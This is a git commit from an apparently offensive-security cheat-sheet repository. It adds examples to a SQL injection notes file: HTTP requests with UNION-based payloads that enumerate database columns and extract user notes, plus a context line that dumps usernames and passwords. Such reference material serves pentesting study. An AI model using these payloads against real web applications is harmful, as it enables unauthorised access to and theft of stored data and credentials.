whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

additions

This commit is contained in:
Stefan Friese 2021-09-29 01:42:26 +02:00
parent 80b94f4663
commit e89be67148
1 changed files with 14 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
exploit/sqli/sqli.md
View File

@ -103,6 +103,20 @@ id=(SELECT banner FROM v$version) # oracle
1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
```
### Examples
* sqli inside HTTP request to an API. Five values inside select have been discovered before
```HTTP
GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
* Get col names
```HTTP
GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
* Get notes from users by id
```HTTP
GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
```
## Tools
### SQLmap
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)